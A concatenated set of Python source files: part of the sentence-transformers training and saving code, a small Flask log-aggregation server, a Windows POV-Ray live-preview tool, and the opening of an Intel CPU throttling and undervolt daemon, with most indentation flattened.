rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
                try:
                    os.chmod(path, stat.S_IWRITE)
                    os.unlink(path)
                except Exception:
                    pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
        Helper function to get the length for the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
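    # Concrete cases for _text_length(): [1, 2, 3] -> 3 (one tokenized text),
    # [[1, 2], [3]] -> 3 (sum over several texts),
    # {'input_ids': [1, 2]} -> 2 (dict of features).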
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
        :param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
            try:
                with open(model_card_path, encoding='utf8') as fIn:
                    self._model_card_text = fIn.read()
            except Exception:
                pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
        Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
server.py | from flask import Flask, url_for
import logging
from logging.handlers import RotatingFileHandler
import sys
import requests
from contextlib import redirect_stderr
from flask import request
from flask import jsonify
import threading
import time
app = Flask(__name__)
runningPort = 5000
listOfClients = []
RETRY_COUNT = 5
def heartbeatTo(ipAddr, port):
time.sleep(5)
currTries = 0
while currTries < RETRY_COUNT:
try:
print("INFO: Attempting HB to " + ipAddr + ":" + str(port))
            requests.head('http://' + ipAddr + ':' + str(port) + '/', timeout=5)
except requests.exceptions.RequestException as e:
print("WARN: Client " + ipAddr + ":" + str(port) + " failed to HB (" +
str(currTries) + ")")
currTries = currTries + 1
time.sleep(5)
continue
break
    if currTries == RETRY_COUNT:
        listOfClients.remove((ipAddr, port))
        print("WARN: Client " + ipAddr + ":" + str(port) + " removed!")
        return  # do not reschedule heartbeats for a client that has been removed
    threading.Timer(3, heartbeatTo, [ipAddr, port]).start()
@app.route('/register/<port>')
def register_client(port):
if (request.remote_addr, int(port)) not in listOfClients:
listOfClients.append((request.remote_addr, int(port)))
print("GET: Registered " + request.remote_addr + ":" + str(port))
t1 = threading.Thread(target = heartbeatTo, args = (request.remote_addr, int(port)))
t1.start()
return "Registered " + str(port)
else:
print("GET: Already registered " + request.remote_addr + ":" + str(port))
return "Already registered" + str(port)
@app.route('/registered')
def registered_clients():
return str(listOfClients)
@app.route('/log')
def give_log():
print("GET: Log")
data = ''
with open(str(runningPort)+'server.log', 'r') as myfile:
data=myfile.read().replace('\n', '</br>')
return data
@app.route('/search/<query>')
def search_log(query):
print("GET: Running log search...")
result = ''
for x in listOfClients:
logString = requests.get('http://'+str(x[0])+':'+str(x[1])+'/log').content
logArray = logString.decode("utf-8").split('</br>')
for y in logArray:
if query in y:
result = result + x[0] + ":" + str(x[1]) + " -> " + y + "\n"
return result
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("INIT: Invalid args! Usage is: server.py [port]")
else:
print("INIT: Starting Server")
runningPort = int(sys.argv[1])
app.debug = True
app.logger.setLevel(logging.DEBUG)
with open(str(runningPort)+'server.log', 'w') as stderr, redirect_stderr(stderr):
app.run(host='localhost', port=runningPort, use_reloader=False)
|
main.py | import atexit
import ctypes
import ctypes.wintypes
import os
import subprocess
import sys
import tkinter
import time
import threading
from PIL import Image,ImageTk
BUFFER_SIZE=2048
IGNORE_TIME=0.05
RENDER_SIZE=(960,540)
ANIMATION_LENGTH=5
FILE_ACTION_MODIFIED=3
FILE_FLAG_BACKUP_SEMANTICS=0x2000000
FILE_FLAG_OVERLAPPED=0x40000000
FILE_LIST_DIRECTORY=1
FILE_NOTIFY_CHANGE_LAST_WRITE=0x10
FILE_SHARE_DELETE=0x4
FILE_SHARE_READ=0x1
FILE_SHARE_WRITE=0x2
INFINITE=0xffffffff
INVALID_HANDLE_VALUE=0xffffffffffffffff
MAX_PATH=260
OPEN_EXISTING=3
WAIT_OBJECT_0=0
ctypes.wintypes.ULONG_PTR=ctypes.POINTER(ctypes.wintypes.DWORD)
ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO=type("CONSOLE_SCREEN_BUFFER_INFO",(ctypes.Structure,),{"_fields_":[("dwSize",ctypes.wintypes._COORD),("dwCursorPosition",ctypes.wintypes._COORD),("wAttributes",ctypes.wintypes.WORD),("srWindow",ctypes.wintypes.SMALL_RECT),("dwMaximumWindowSize",ctypes.wintypes._COORD)]})
ctypes.wintypes.FILE_NOTIFY_INFORMATION=type("FILE_NOTIFY_INFORMATION",(ctypes.Structure,),{"_fields_":[("NextEntryOffset",ctypes.wintypes.DWORD),("Action",ctypes.wintypes.DWORD),("FileNameLength",ctypes.wintypes.DWORD),("FileName",ctypes.wintypes.WCHAR*MAX_PATH)]})
ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME=type("OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME",(ctypes.Structure,),{"_fields_":[("Offset",ctypes.wintypes.DWORD),("OffsetHigh",ctypes.wintypes.DWORD)]})
ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME=type("OVERLAPPED_DUMMYUNIONNAME",(ctypes.Union,),{"_fields_":[("_0",ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME_DUMMYSTRUCTNAME),("Pointer",ctypes.wintypes.LPVOID)],"_anonymous_":["_0"]})
ctypes.wintypes.OVERLAPPED=type("OVERLAPPED",(ctypes.Structure,),{"_fields_":[("Internal",ctypes.wintypes.ULONG_PTR),("InternalHigh",ctypes.wintypes.ULONG_PTR),("_0",ctypes.wintypes.OVERLAPPED_DUMMYUNIONNAME),("hEvent",ctypes.wintypes.HANDLE)],"_anonymous_":["_0"]})
ctypes.wintypes.PCONSOLE_SCREEN_BUFFER_INFO=ctypes.POINTER(ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO)
ctypes.wintypes.LPOVERLAPPED=ctypes.POINTER(ctypes.wintypes.OVERLAPPED)
ctypes.wintypes.LPOVERLAPPED_COMPLETION_ROUTINE=ctypes.c_void_p
ctypes.wintypes.LPSECURITY_ATTRIBUTES=ctypes.c_void_p
ctypes.windll.kernel32.CloseHandle.argtypes=(ctypes.wintypes.HANDLE,)
ctypes.windll.kernel32.CloseHandle.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.CreateEventW.argtypes=(ctypes.wintypes.LPSECURITY_ATTRIBUTES,ctypes.wintypes.BOOL,ctypes.wintypes.BOOL,ctypes.wintypes.LPCWSTR)
ctypes.windll.kernel32.CreateEventW.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.CreateFileW.argtypes=(ctypes.wintypes.LPCWSTR,ctypes.wintypes.DWORD,ctypes.wintypes.DWORD,ctypes.wintypes.LPSECURITY_ATTRIBUTES,ctypes.wintypes.DWORD,ctypes.wintypes.DWORD,ctypes.wintypes.HANDLE)
ctypes.windll.kernel32.CreateFileW.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.FillConsoleOutputAttribute.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.WORD,ctypes.wintypes.DWORD,ctypes.wintypes._COORD,ctypes.wintypes.LPDWORD)
ctypes.windll.kernel32.FillConsoleOutputAttribute.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.FillConsoleOutputCharacterA.argtypes=(ctypes.wintypes.HANDLE,ctypes.c_char,ctypes.wintypes.DWORD,ctypes.wintypes._COORD,ctypes.wintypes.LPDWORD)
ctypes.windll.kernel32.FillConsoleOutputCharacterA.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.GetConsoleScreenBufferInfo.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.PCONSOLE_SCREEN_BUFFER_INFO)
ctypes.windll.kernel32.GetConsoleScreenBufferInfo.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.GetStdHandle.argtypes=(ctypes.wintypes.DWORD,)
ctypes.windll.kernel32.GetStdHandle.restype=ctypes.wintypes.HANDLE
ctypes.windll.kernel32.ReadDirectoryChangesW.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.LPVOID,ctypes.wintypes.DWORD,ctypes.wintypes.BOOL,ctypes.wintypes.DWORD,ctypes.wintypes.LPDWORD,ctypes.wintypes.LPOVERLAPPED,ctypes.wintypes.LPOVERLAPPED_COMPLETION_ROUTINE)
ctypes.windll.kernel32.ReadDirectoryChangesW.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.ResetEvent.argtypes=(ctypes.wintypes.HANDLE,)
ctypes.windll.kernel32.ResetEvent.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.SetConsoleCursorPosition.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes._COORD)
ctypes.windll.kernel32.SetConsoleCursorPosition.restype=ctypes.wintypes.BOOL
ctypes.windll.kernel32.WaitForSingleObject.argtypes=(ctypes.wintypes.HANDLE,ctypes.wintypes.DWORD)
ctypes.windll.kernel32.WaitForSingleObject.restype=ctypes.wintypes.DWORD
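# run() renders the given .pov file with bin/pov.exe into a temp directory, shows the
# result in a borderless always-on-top tkinter window, and re-renders whenever the file
# changes (detected via ReadDirectoryChangesW with overlapped I/O on the parent directory).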
def run(fp):
def _render(td,fp):
def _run_r(td,fp):
ctypes.windll.kernel32.FillConsoleOutputCharacterA(ho,ctypes.c_char(b" "),sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.FillConsoleOutputAttribute(ho,7,sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.SetConsoleCursorPosition(ho,ctypes.wintypes._COORD(0,0))
dt=""
if (os.path.exists(f"{fp[:-3]}ini")):
with open(f"{fp[:-3]}ini","r") as f:
dt=f.read()
with open(f"{td}/__tmp.ini","w") as f:
f.write(f"{dt}\nLibrary_Path=bin/lib/include\nWidth={RENDER_SIZE[0]}\nHeight={RENDER_SIZE[1]}\nOutput_File_Name={td}/__out.png\nInput_File_Name={fp}\nOutput_To_File=true\nVerbose=false\nWarning_Console=false\nDebug_Console=false\nRender_Console=false\nStatistic_Console=false\n")
o=subprocess.run(["bin/pov.exe",f"{td}/__tmp.ini"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.strip().replace(b"\r\n",b"\n")[:-14]
if (os.path.exists(f"{td}/__out.png")):
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w-RENDER_SIZE[0]}+{h-RENDER_SIZE[1]}")
img=Image.open(f"{td}/__out.png")
r._tm=0
r._tm_idx=0
r._im_l=[ImageTk.PhotoImage(image=img)]
img.close()
os.remove(f"{td}/__out.png")
l=tuple(os.listdir(td))
if (len(l)>1):
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w-RENDER_SIZE[0]}+{h-RENDER_SIZE[1]}")
r._im_l.clear()
for k in l:
if (k[-4:]==".png"):
img=Image.open(f"{td}/{k}")
r._im_l.append(ImageTk.PhotoImage(image=img))
img.close()
os.remove(f"{td}/{k}")
r._tm=0
r._tm_idx=0
else:
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w}+{h}")
sys.__stdout__.write(str(o,"utf-8"))
thr=threading.Thread(target=_run_r,args=(td,fp),kwargs={})
thr.daemon=True
thr.start()
def _read_dc(fp):
fp=os.path.abspath(fp)
d="/".join(fp.replace("\\","/").split("/")[:-1])
f=fp[len(d)+1:]
td=os.path.abspath((os.getenv("TEMP") if os.getenv("TEMP") else os.getenv("TMP"))).replace("\\","/").strip("/")+"/__povray_cli_data"
if (not os.path.exists(td)):
os.mkdir(td)
_render(td,fp)
dh=ctypes.windll.kernel32.CreateFileW(d,FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,0,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OVERLAPPED,0)
if (dh!=INVALID_HANDLE_VALUE):
atexit.register(lambda:ctypes.windll.kernel32.CloseHandle(dh))
bf=ctypes.create_string_buffer(BUFFER_SIZE)
ov=ctypes.wintypes.OVERLAPPED()
ov.hEvent=ctypes.windll.kernel32.CreateEventW(0,True,False,None)
ig_tm=0
dt=ctypes.wintypes.FILE_NOTIFY_INFORMATION()
while (True):
ctypes.windll.kernel32.ReadDirectoryChangesW(dh,bf,BUFFER_SIZE,False,FILE_NOTIFY_CHANGE_LAST_WRITE,ctypes.byref(ctypes.wintypes.DWORD()),ctypes.byref(ov),0)
if (ctypes.windll.kernel32.WaitForSingleObject(ov.hEvent,INFINITE)==WAIT_OBJECT_0):
ctypes.windll.kernel32.ResetEvent(ov.hEvent)
if (ig_tm>time.time()):
continue
ig_tm=time.time()+IGNORE_TIME
i=0
while (True):
ctypes.memmove(ctypes.addressof(dt),bf[i:],min(ctypes.sizeof(dt),len(bf)-i))
if (dt.Action==FILE_ACTION_MODIFIED and dt.FileName[:dt.FileNameLength//ctypes.sizeof(ctypes.wintypes.WCHAR)]==f):
_render(td,fp)
if (dt.NextEntryOffset==0):
break
else:
                            i+=dt.NextEntryOffset  # NextEntryOffset is relative to the current record
def _render_loop():
ct=time.time()
if (r._tm<=ct and len(r._im_l)>0):
r._tm=ct+ANIMATION_LENGTH/len(r._im_l)
c.delete(tkinter.ALL)
c.create_image(0,0,image=r._im_l[r._tm_idx],anchor=tkinter.NW)
r._tm_idx=(r._tm_idx+1)%len(r._im_l)
r.after(1000//60,_render_loop)
ctypes.windll.user32.SetProcessDPIAware()
sbi=ctypes.wintypes.CONSOLE_SCREEN_BUFFER_INFO()
ho=ctypes.windll.kernel32.GetStdHandle(-11)
ctypes.windll.kernel32.GetConsoleScreenBufferInfo(ho,ctypes.byref(sbi))
ctypes.windll.kernel32.FillConsoleOutputCharacterA(ho,ctypes.c_char(b" "),sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.FillConsoleOutputAttribute(ho,7,sbi.dwSize.X*sbi.dwSize.Y,ctypes.wintypes._COORD(0,0),ctypes.byref(ctypes.wintypes.DWORD()))
ctypes.windll.kernel32.SetConsoleCursorPosition(ho,ctypes.wintypes._COORD(0,0))
thr=threading.Thread(target=_read_dc,args=(fp,),kwargs={})
thr.daemon=True
thr.start()
r=tkinter.Tk()
r.attributes("-topmost",True)
r.resizable(False,False)
r.overrideredirect(True)
r.bind("<Escape>",lambda _:r.destroy())
w=r.winfo_screenwidth()
h=r.winfo_screenheight()
r.geometry(f"{RENDER_SIZE[0]}x{RENDER_SIZE[1]}+{w}+{h}")
c=tkinter.Canvas(r,width=RENDER_SIZE[0],height=RENDER_SIZE[1],highlightthickness=0,background="#000000",cursor="tcross")
c.pack()
r.update_idletasks()
r._tm=0
r._tm_idx=0
r._im_l=[]
r.after(1000//60,_render_loop)
r.mainloop()
run(sys.argv[1])
|
throttled.py | #!/usr/bin/env python3
from __future__ import print_function
import argparse
import configparser
import glob
import gzip
import os
import re
import struct
import subprocess
import sys
from collections import defaultdict
from datetime import datetime
from errno import EACCES, EIO, EPERM
from multiprocessing import cpu_count
from platform import uname
from threading import Event, Thread
from time import time
import dbus
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GLib
from mmio import MMIO, MMIOError
DEFAULT_SYSFS_POWER_PATH = '/sys/class/power_supply/AC*/online'
VOLTAGE_PLANES = {'CORE': 0, 'GPU': 1, 'CACHE': 2, 'UNCORE': 3, 'ANALOGIO': 4}
CURRENT_PLANES = {'CORE': 0, 'GPU': 1, 'CACHE': 2}
TRIP_TEMP_RANGE = [40, 97]
UNDERVOLT_KEYS = ('UNDERVOLT', 'UNDERVOLT.AC', 'UNDERVOLT.BATTERY')
ICCMAX_KEYS = ('ICCMAX', 'ICCMAX.AC', 'ICCMAX.BATTERY')
power = {'source': None, 'method': 'polling'}
MSR_DICT = {
'MSR_PLATFORM_INFO': 0xCE,
'MSR_OC_MAILBOX': 0x150,
'IA32_PERF_STATUS': 0x198,
'IA32_THERM_STATUS': 0x19C,
'MSR_TEMPERATURE_TARGET': 0x1A2,
'MSR_POWER_CTL': 0x1FC,
'MSR_RAPL_POWER_UNIT': 0x606,
'MSR_PKG_POWER_LIMIT': 0x610,
'MSR_INTEL_PKG_ENERGY_STATUS': 0x611,
'MSR_DRAM_ENERGY_STATUS': 0x619,
'MSR_PP1_ENERGY_STATUS': 0x641,
'MSR_CONFIG_TDP_CONTROL': 0x64B,
'IA32_HWP_REQUEST': 0x774,
}
HWP_PERFORMANCE_VALUE = 0x20
HWP_DEFAULT_VALUE = 0x80
HWP_INTERVAL = 60
platform_info_bits = {
'maximum_non_turbo_ratio': [8, 15],
'maximum_efficiency_ratio': [40, 47],
'minimum_operating_ratio': [48, 55],
'feature_ppin_cap': [23, 23],
'feature_programmable_turbo_ratio': [28, 28],
'feature_programmable_tdp_limit': [29, 29],
'number_of_additional_tdp_profiles': [33, 34],
'feature_programmable_temperature_target': [30, 30],
'feature_low_power_mode': [32, 32],
}
thermal_status_bits = {
'thermal_limit_status': [0, 0],
'thermal_limit_log': [1, 1],
'prochot_or_forcepr_status': [2, 2],
'prochot_or_forcepr_log': [3, 3],
'crit_temp_status': [4, 4],
'crit_temp_log': [5, 5],
'thermal_threshold1_status': [6, 6],
'thermal_threshold1_log': [7, 7],
'thermal_threshold2_status': [8, 8],
'thermal_threshold2_log': [9, 9],
'power_limit_status': [10, 10],
'power_limit_log': [11, 11],
'current_limit_status': [12, 12],
'current_limit_log': [13, 13],
'cross_domain_limit_status': [14, 14],
'cross_domain_limit_log': [15, 15],
'cpu_temp': [16, 22],
'temp_resolution': [27, 30],
'reading_valid': [31, 31],
}
supported_cpus = {
(6, 26, 1): 'Nehalem',
(6, 26, 2): 'Nehalem-EP',
(6, 26, 4): 'Bloomfield',
(6, 28, 2): 'Silverthorne',
(6, 28, 10): 'PineView',
